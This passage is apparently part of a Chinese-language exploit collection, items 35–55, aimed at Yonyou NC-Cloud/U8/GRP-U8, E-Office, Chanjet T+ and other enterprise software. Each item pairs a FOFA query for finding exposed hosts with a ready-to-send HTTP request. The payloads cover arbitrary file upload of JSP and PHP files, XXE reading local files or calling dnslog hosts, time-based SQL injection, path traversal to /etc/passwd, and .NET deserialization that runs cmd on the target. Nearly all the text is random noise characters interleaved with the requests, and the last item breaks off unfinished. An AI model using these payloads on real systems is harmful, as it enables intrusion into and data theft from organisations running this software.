Accept-Encoding: gzip, deflate
: u8 L0 a4 y: O" H: F" ^$ CAccept: */*$ m1 J6 D+ v, P4 E" J
Connection: keep-alive1 k: k. p8 ?. d, j

, E# o. c0 y  K5 D& T4 T2 e9 a- v
# M) d& f8 R$ n  V' [+ h35. 用友NC-Cloud importhttpscer任意文件上传
2 h0 F8 @( x) o- k" wFOFA:app="用友-NC-Cloud"
2 x& X. B  k/ TPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.17 S5 @5 i- V/ H( h1 V) f
Host: 203.25.218.166:8888" r- p2 |" Q, U% ?5 a
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( O- t$ S. N: }! k" U
Accept-Encoding: gzip, deflate+ Y8 ]& S" ?; k
Accept: */*
6 S# r% g5 S! M' R1 M, U+ cConnection: close5 g6 I4 B5 \4 t& g" s3 j
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA( u8 d) Z) \* t* g( v$ H1 M
Content-Length: 190
* k0 e1 j" P: u- ]  r2 W" V0 ?Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0/ i3 F! ?% G3 s
, [3 T5 e: o$ m" j% }7 F# D
--fd28cb44e829ed1c197ec3bc71748df0
% T7 x  S) c1 c% P4 e0 ]5 B8 WContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
5 ^/ g4 U0 i5 @4 d( a6 _: {9 u* S6 Y
<%out.println(1111*1111);%>
) C8 x! @7 H1 q7 t3 P) s% {--fd28cb44e829ed1c197ec3bc71748df0--% x% t. {  }' }7 h2 m2 b$ D8 S, @
& E- A! u, ^/ T& f% h

- E2 t1 s7 A8 L+ ~/ v# ~! E36. 用友NC-Cloud soapFormat XXE7 s: L4 E. `) ^8 ?/ o: @4 g
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
; T3 F$ y# [% s. M, L5 h: D$ @POST /uapws/soapFormat.ajax HTTP/1.1; O7 S8 ~! Y: Y) w$ ?8 u$ l
Host: 192.168.40.130:8989' q- A9 m7 @- d1 @3 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.04 S4 D2 q3 _* ^9 `. ~
Content-Length: 263
# m% _$ k% p; H" a1 q9 y+ T/ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ f8 D4 R3 L5 t. j7 U
Accept-Encoding: gzip, deflate* b% j" B* |3 S9 l: p( F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 y5 d. w3 i3 }- L6 MConnection: close$ T& X4 E6 o' S
Content-Type: application/x-www-form-urlencoded
& o; L0 x$ g: \' Q. P  p  pUpgrade-Insecure-Requests: 16 G) K( Z3 t; t3 ^

  [  r+ P8 o, M1 |msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
& Z' y+ |4 A" S: J- d5 @
/ e# L: z( k: V
9 V. g5 C3 E9 s5 _/ T5 o37. 用友NC-Cloud IUpdateService XXE" b& H) O" K' ^0 c
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
7 V; s$ f9 a+ aPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.12 R7 K# I& y$ K, j) v" @; X
Host: 192.168.40.130:8989. j) Q1 g7 `' Y& n/ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.367 a' A- P* {$ A
Content-Length: 421- I5 H5 j' N/ l. A8 {* p% P/ L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' Z! U# @7 b  i0 `. D" rAccept-Encoding: gzip, deflate  T% M4 Z/ u3 Z# h1 |9 {& m
Accept-Language: zh-CN,zh;q=0.9
4 |- Z% T* r  \3 L( qConnection: close- |; ~% A$ R* s8 T5 W+ y* g/ A' v
Content-Type: text/xml;charset=UTF-8
* _. a0 g* m; aSOAPAction: urn:getResult
# u% ~. ?0 [9 Q8 I. fUpgrade-Insecure-Requests: 1& d( v9 {1 ]) a4 \
' E$ J+ v; d- o
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">% _7 j- D( R9 W  X4 z7 b# T) f
<soapenv:Header/>
; G) F% m) Q6 X) O1 ?# Z<soapenv:Body># x, i1 Z4 g& M$ O9 I7 G# U
<iup:getResult>: t2 `0 L) {+ C5 }8 I# b/ n8 X
<!--type: string-->( Y! n$ |2 z: x( [0 `. x. Y1 E
<iup:string><![CDATA[- I: ~* Q" T, i& W# C1 _& ~6 L
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
2 `, c, J- V1 K<xxx/>]]></iup:string>
& T1 z8 `% B" i+ W  D( J8 L6 ?</iup:getResult>) a, G. C8 G; L/ r1 W! N
</soapenv:Body>
/ \) ~' R) H+ K5 Z</soapenv:Envelope>* O3 @6 b. |% S0 O3 }
" O; _) Y- q% K/ @1 n- t
) M) \' `* j1 \- W( S3 d/ L0 u! P

7 r" ~& N% R. J# y38. 用友U8 Cloud smartweb2.RPC.d XXE- f6 z- {. X& x0 ]. w# P3 @3 B
FOFA:app="用友-U8-Cloud"
, n8 X* f; h* W" ^; s- B2 Q2 L+ ^POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
/ i; u+ D' D) h# D, k! v. sHost: 192.168.40.131:8088
8 ^. I4 c# G" @) k! d7 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
1 U* A4 `4 d) x: CContent-Length: 260& w% e- ]' G8 n9 k' H" _: R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
" M0 o( b# U5 h8 pAccept-Encoding: gzip, deflate
/ Z- I9 {  \& w  C* hAccept-Language: zh-CN,zh;q=0.9
; i' f$ t8 F% u0 lConnection: close0 j+ `' y5 [$ k0 D7 G
Content-Type: application/x-www-form-urlencoded+ K2 O8 g: \/ A" X  v

3 M; y% O; L# z0 I0 i  ?: r( B__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
6 i2 I6 |& Z* J4 F6 {
8 m' U# D& S# w- o/ i3 @# |2 n
  a. M+ a3 y  ?( ^& |8 D# ?( b* @39. 用友U8 Cloud RegisterServlet SQL注入
. y' N& ]$ k, f# `( g7 a% i5 b% EFOFA:title="u8c"; w$ B8 m, V, y) \* i, G& O+ R2 o$ n/ Y
POST /servlet/RegisterServlet HTTP/1.1
3 G& L- {( t( m7 h2 {% y* Z5 G- {Host: 192.168.86.128:80892 Y0 \/ r, [3 r  R  l8 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.368 z( C) A. l0 R% j  J' O6 i* ^
Connection: close7 y1 @( b5 \  R. t; D
Content-Length: 85
1 B, s; }$ D. D$ k0 ?9 {Accept: */*5 d8 J9 r" R- ]- z; H
Accept-Language: en
1 E, P* q4 r) \+ j& g4 @Content-Type: application/x-www-form-urlencoded
: b& _3 E' R8 Q% \; XX-Forwarded-For: 127.0.0.1
0 r! k( a! L! Q/ j" V( Z4 KAccept-Encoding: gzip
4 n$ O2 H# S' x4 N' m0 s  p
& N; m9 m/ E  t3 ?usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--' r: v- s/ o& I. I" N# M* q
' }* V* Y5 ^% g" q% A
1 ]7 Q2 J  B& Q" T8 Q9 ?
40. 用友U8-Cloud XChangeServlet XXE
: ~0 u% L" ^$ h/ T, y) eFOFA:app="用友-U8-Cloud"( m# z  f4 m/ ^  U2 E
POST /service/XChangeServlet HTTP/1.1' I- s1 F/ y# t; n
Host: x.x.x.x* L+ T) h( l7 w: T' |+ H( C- _3 l
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& j5 S1 G" W( k* C2 [* z
Content-Type: text/xml' W9 u6 J3 J/ ~+ i& J1 H
Connection: close
- Q' O& X/ O9 K4 S' B, B' {6 g  o  A* r4 K: `( L; U. V  I% n
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
; _: A8 a; i% M- j, l, G8 _& y% |: N/ {3 Z

4 E5 @7 r6 [5 y! \4 N/ c% p) e41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
, g2 Z4 f1 T) \! N& O9 qFOFA:app="用友-U8-Cloud"  w, c" b0 ?: k: l1 B8 p
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
4 S0 }5 O" v$ ~# x9 vHost:* D& m8 ]7 ^0 _. V  _6 k' b* z8 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! J6 q! ]! w7 aContent-Type: application/json
$ y  g  ^1 ]! Q8 g- @' l7 PAccept-Encoding: gzip
8 Z1 s# Y* r$ F/ {6 J% k4 mConnection: close
+ {) I; b( Y1 \& \6 H* M6 g- I" g- r& Z6 }3 S- {

2 C+ [/ C$ d7 x42. 用友GRP-U8 SmartUpload01 文件上传7 r' k/ x+ G1 R
FOFA:app="用友-GRP-U8"* Z) B7 }. @( t# B6 U
POST /u8qx/SmartUpload01.jsp HTTP/1.1, w0 b8 U8 r' T: t0 f& q( P2 w+ F
Host: x.x.x.x
2 p: J  O/ Y3 c4 rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt' r9 V4 ?: C' l8 @7 {" U% m0 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
2 Q+ {& P8 x8 O& H  s7 H! Z' Q$ o4 y/ b
PAYLOAD8 a5 B1 ]5 y: d5 H: a4 ^  \$ m" M5 n# P8 B
; g- _- W) M& ^
4 \' G1 p+ w  E7 u" g
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
+ J- E  _& c$ X" t0 g1 V5 c0 @  o$ B
! B; }+ i1 ]- N3 Q43. 用友GRP-U8 userInfoWeb SQL注入致RCE
4 q3 R* b" t2 c+ {9 fFOFA:app="用友-GRP-U8"5 H: d3 }, y1 Y  j" ~- Y0 a
POST /services/userInfoWeb HTTP/1.1
& @  o1 X, ~1 ~$ iHost: your-ip. c6 {$ t8 O1 v1 P8 F& D5 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 P6 O2 h9 A2 U4 {, VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 n7 F" p& H; AAccept-Encoding: gzip, deflate
; ?! n3 Z* v1 X2 Y* YAccept-Language: zh-CN,zh;q=0.98 |4 n' [! c9 l0 t$ y6 b. \5 o
Connection: close5 {- F- S2 l3 ^# X/ `
SOAPAction:. b7 r) F5 ~/ A4 V
Content-Type: text/xml;charset=UTF-8
8 ?- Y0 D2 p$ l3 p5 n( J4 z3 c+ \7 n& s) ~- m& J. [4 ?0 B
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
/ R6 T! t& p/ }* K6 ^   <soapenv:Header/>& \' C, j1 I4 t
   <soapenv:Body>
& I) X, E6 o6 k) g" ]7 d      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  p: I  t1 \2 Q0 a         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>1 v! Z4 @, f) v% ^2 M
      </ser:getUserNameById>; k( V% o' H: @9 e' w7 i/ a2 T6 G& L
   </soapenv:Body>+ B) o5 N; f/ Q: E* K
</soapenv:Envelope>
3 i# B9 }- g. c/ J
2 i4 o: T# b& p& n: {* L  E6 P6 ]. M/ X! Y) t7 T# X
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
# L# F# }$ E: y# OFOFA:app="用友-GRP-U8"
; D3 `) B* e- y2 E2 J' e* LGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
3 d' o& E$ B6 n- a. y) |' \. JHost: your-ip9 ~: l4 Q5 [& t( W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36& `9 p% Z- E( r! d: H/ s& N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 o4 ~5 z% x% Z) r, J6 UAccept-Encoding: gzip, deflate' b. _4 ~9 W0 o8 l. ?9 a" R
Accept-Language: zh-CN,zh;q=0.9
2 ]3 ~! c! H) d, p' K$ y  V: f) wConnection: close2 g0 P; W! B; p& d0 B$ L
% c  ?6 _. D& b# `
) a8 @9 h  @3 ?
45. 用友GRP-U8 ufgovbank XXE
8 i# q& A3 \- Q% Q: ~- g% eFOFA:app="用友-GRP-U8"1 T8 ?3 U3 @3 o# F+ |  S
POST /ufgovbank HTTP/1.17 T/ g& X# G( o6 O3 o3 W. J
Host: 192.168.40.130:2224 y6 \" }/ I1 `4 N6 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+ U- Z4 C4 H) q( P/ r- bConnection: close2 a  X' ?" b7 E) f3 j2 P9 H& r  y
Content-Length: 161
/ T' p" l  h: ^& y" X6 i1 x6 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" q! [8 _4 G3 T6 z. o, \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 a  T! X9 \' D, B
Content-Type: application/x-www-form-urlencoded, Q3 Y7 g7 [" }6 }
Accept-Encoding: gzip
' ], q& I  m9 Z4 |5 {) U: Z4 _
# [4 t$ W3 Z- X0 q! B1 ZreqData=<?xml version="1.0"?>
' T) m5 ?$ x: j% C<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest" n0 S0 j* g* e4 ^7 V
, q% C% g  b3 a9 i% A
0 x1 @  {: G6 e* H0 r0 g
46. 用友GRP-U8 sqcxIndex.jsp SQL注入1 t1 O$ F5 |3 @5 C% h
FOFA:app="用友-GRP-U8"
- [+ \# W( @! o) j6 F) L! y% nGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1" C+ i7 J7 S* U
Host: your-ip( s% d* X1 W8 r7 E, W% ~1 o8 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
$ p" @8 n/ ?; M. o; _) Z% W1 S7 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 b$ x3 G& m% A2 w$ T2 i# U0 nAccept-Encoding: gzip, deflate
# ?' {# U/ \. _  |& ~5 f9 O. eAccept-Language: zh-CN,zh;q=0.9
/ V  M1 b5 x; q$ X: mConnection: close
) i, w2 `+ L8 n8 n9 y/ r$ b' \" ^2 u& P; i! @) X

4 W0 G8 X  L3 v; d$ T7 D$ s47. 用友GRP A++Cloud 政府财务云 任意文件读取
8 U* Q' W$ d, R) d. vFOFA:body="/pf/portal/login/css/fonts/style.css"0 z4 d. N1 \. X" ^, f* \
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1; K$ O5 C/ o$ h1 Y6 ?4 Z. K
Host: x.x.x.x
  i; |0 ?( q8 r% T3 {Cache-Control: max-age=0
, A9 b: g6 [$ ^Upgrade-Insecure-Requests: 1
6 G: O7 a  L/ m' sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! Y0 c) d3 f6 L7 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 o- U1 Q6 ~# Y" L7 y0 `
Accept-Encoding: gzip, deflate, br6 Q( v6 _; o) a4 v. E3 _' `  X
Accept-Language: zh-CN,zh;q=0.9
) w& T8 k% i5 vIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT: D1 ?/ h* j; a8 T; _+ N0 g
Connection: close" V( c/ Q. }6 Z" Z9 e2 z& u& R
. R, X1 a7 i. g( |8 p( \# A* I# y

, o8 k) l! _) s2 y5 q& q/ v  X) W) W. ?2 k) j: Y( U' K& M) Z
48. 用友U8 CRM swfupload 任意文件上传/ F5 h+ P) c. \  D
FOFA:title="用友U8CRM"
" i6 [) h+ O/ }0 _3 [; q8 H7 QPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.13 t8 s! Q# [( Z; R+ c/ I: F
Host: your-ip9 Z+ C/ g/ n; {# e! G7 d, k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ P  |8 ^. X" F" W0 x$ ^) L5 D- D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" E( j& o8 Y2 K4 fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* ^) y, z6 h+ ~; }% T
Accept-Encoding: gzip, deflate+ `$ g5 i8 @, w/ D, P9 C, Y
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
- B/ b* H/ y* x, j0 U------269520967239406871642430066855/ M8 B4 x; G0 R. r: v
Content-Disposition: form-data; name="file"; filename="s.php"
( e2 `* Z8 l9 B12318 ?5 ]' |% @3 M$ F
Content-Type: application/octet-stream, r9 j$ b! w" S, V; h% m0 \
------269520967239406871642430066855
4 @7 r5 o$ u! M& A! jContent-Disposition: form-data; name="upload"
1 c$ {4 e2 f6 H" Z" supload
, S, x* V0 H' ~$ ]$ e: s2 M5 D2 B------269520967239406871642430066855--
1 S4 w& b1 m( I& s7 ?0 ?, k5 |: C! g$ B& C( d/ C

& n/ B$ k! ~! A7 \2 j  S6 e49. 用友U8 CRM系统uploadfile.php接口任意文件上传
: T8 Y9 {- o5 V; l# e% W( y- |FOFA:body="用友U8CRM"& P8 I) M7 R: _  G: ?

( O9 j: d6 _. k6 N, p& RPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
2 Y6 I9 k8 f& U; w* ~8 K" bHost: x.x.x.x9 B/ w) r  n; A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 k% n* h1 ^5 m* i
Content-Length: 329
" u; g/ O; J% \6 f8 n" m3 V, CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: w! L3 W5 E6 c4 o
Accept-Encoding: gzip, deflate
9 u: r0 s/ X. Y. y+ sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 q( f" I" n6 Y, C( JConnection: close
. H5 L, G0 V  P" k0 @Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
- u: v6 F& t5 q% }8 v) d7 I6 K9 j. K
2 J* y5 [- h% z3 o-----------------------------vvv3wdayqv3yppdxvn3w
* v: Y6 s* u  Y) J7 s8 q3 |Content-Disposition: form-data; name="file"; filename="%s.php "4 _5 r% a1 `: y- v8 L3 o
Content-Type: application/octet-stream
% ~4 {( `0 E( b# N
* n6 [8 K; s& Q- t) t9 Mwersqqmlumloqa
/ r5 z& O: K4 S/ ]-----------------------------vvv3wdayqv3yppdxvn3w$ b* p$ i: G2 W* r/ R2 }! ], B+ w
Content-Disposition: form-data; name="upload"; Q- i1 ]; C( a" i5 [4 z! t

  R% a6 x2 ^9 e3 ^0 s8 |) Vupload2 U! P8 L3 X. }9 u
-----------------------------vvv3wdayqv3yppdxvn3w--, @" v& N7 Z# ]3 d! {1 ]7 G

( Z+ D: L) W: b5 V, e% g
0 Z% L- h$ Q; y, E6 {- rhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
4 P/ s3 i. k2 w5 S) p3 p  p, `' O" _0 n. w7 X
50. QDocs Smart School 6.4.1 filterRecords SQL注入6 [' I1 u0 e+ |) R8 ?' Z1 r
FOFA:body="close closebtnmodal"
( O6 N! q% G' s2 X' F5 lPOST /course/filterRecords/ HTTP/1.18 s9 N6 ]$ Y9 V- Q2 ~# n1 g. m
Host: x.x.x.x
& n# U' q- Y" B" C: }6 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. @6 u3 k+ I$ k. h' I7 N: o( vConnection: close6 Q2 D% n, h& B
Content-Length: 224
: f& a4 x' R7 `4 a9 k  w: EAccept: */*
' _8 j! N9 B, gAccept-Language: en
. E# B- H$ d* t: Z1 hContent-Type: application/x-www-form-urlencoded
9 {0 ?! y+ L6 x# r& W& aAccept-Encoding: gzip2 H5 X! c6 a! v

3 H4 V  ^8 A# e( Q& |2 c4 hsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
/ q& U8 @: ?* h) s0 n, U, Y  b+ ^: o8 g+ }. h2 \3 f

9 ~) R7 w( L3 f8 F+ C4 S51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入5 ]' W$ D7 L6 ]
FOFA:app="云时空社会化商业ERP系统"
: ^7 f. w$ n. ]8 r1 W& SGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1' |( \, l1 ^- J3 p+ d6 K" l
Host: your-ip1 J& G% H+ W' T  ^  G' i
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36: \7 \" ^( a9 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6 l* F2 s2 ?2 u8 JAccept-Encoding: gzip, deflate
6 q: N- J( ~; \5 J) XAccept-Language: zh-CN,zh;q=0.95 |" h$ B$ y; f, h5 T+ S- u+ k
Connection: close1 ^7 y8 |$ h/ ^0 k
: X% d) f7 r3 x) ]

: E7 ]2 b$ ?. I5 I  N52. 泛微E-Office json_common.php sql注入
! A$ a7 `, l3 h' }* MFOFA:app="泛微-EOffice"0 M, [5 g+ t7 v1 M/ p
POST /building/json_common.php HTTP/1.1
' |# i1 z3 ^' ^  s" r4 NHost: 192.168.86.128:8097
4 p, P' u- h$ r( Y; h; iUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 s: [. H8 o4 ZConnection: close. Y5 |. z3 G  P: c
Content-Length: 87
4 ?3 Q5 `  q! D' F% }* MAccept: */*
* D7 [, N0 T8 X' S  i" a9 ^8 N8 l7 \0 ~Accept-Language: en; o. Z1 W' x* f
Content-Type: application/x-www-form-urlencoded
; w1 ]" ~8 L6 F2 P: k8 rAccept-Encoding: gzip5 \0 X1 u: ~2 Q  ~
9 H1 ~, u$ ]7 h8 J
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333: w9 n+ Z+ D  t# P' Z

$ m/ C/ r& S0 V1 t& r9 c) s9 |# y: v" X
53. 迪普 DPTech VPN Service 任意文件上传
6 y( o9 J8 M4 N* fFOFA:app="DPtech-SSLVPN"
* b6 q9 x; Q2 f0 f/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
3 y1 O0 W6 N" `! Q/ c( s# ?8 m* K/ ]- n) ]5 ^6 s

/ s) Z: i! U" H' U8 w* S% D54. 畅捷通T+ getstorewarehousebystore 远程代码执行
5 q* }. o/ m, x9 Z" vFOFA:app="畅捷通-TPlus"# h% F6 h2 i' }& o- u( s+ _
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件, ]  l- k; S; t( t
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
; H9 M7 L) }9 I; L+ Q% X& |. D& ~0 [1 X. q9 N* _& E2 M+ d. ?$ A: k
5 p3 e5 S5 {$ v6 e! c
完整数据包
# V9 o) Z" I. J! b' P% \POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
+ K6 C/ V8 f; QHost: x.x.x.x) w0 V( p. L. P9 ~9 O
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F% K0 `4 E8 x0 v3 s' P) C* D
Content-Length: 5930 [% e# j$ k' x1 r' V1 b

; b; s* ?' `. a- j) G- {( ^{
' F- o# p% `+ l  W5 H, _$ W" G"storeID":{, O9 t5 @, N8 r, n- c
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
% M. W' `2 H# s# z0 y "MethodName":"Start",
( I' M4 q2 [- n" r5 s( U8 |4 M  "ObjectInstance":{, X- l5 G# J$ k& s% p- L( @$ \3 V
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 R- m5 C; U, S$ g
    "StartInfo":{/ i6 E( j" h& q6 ^+ J
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ b5 B4 [; c. E# o+ \8 L8 n8 s    "FileName":"cmd",( w! N! u" P! I! `' U4 X9 [
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( c" G* F6 L) }7 m0 ~! b& C
    }6 h6 a6 l! \+ h$ ^/ s% Y
  }# X. S. D  @/ w# N2 d: v% L3 f. n
  }3 n: F; e! A. _2 @5 ?: e; b! k1 d
}0 O- g# P$ _1 {1 e( E: w" p

9 |% [! X- {. c9 M% A" l! B6 t( W* v
第二步,访问如下url) D5 R& d* a6 c9 z$ H% S
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
( X- f. y7 m3 J$ n$ d4 C: C/ r. D% d* Q' B! Q6 c
2 W% O( h/ d# v3 c2 R- A5 j
55. 畅捷通T+ getdecallusers信息泄露
" {5 v" @) Q& G% h: ~FOFA:app="畅捷通-TPlus"; h. o$ c& G+ M2 y; r4 J6 M
第一步,通过
5 N9 u# ~1 j9 B+ [/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
* g9 }' u! [/ @0 O第二步,利用获取到的Cookie请求3 m3 ?: Q9 ^& S! T2 k3 z9 y, P) c
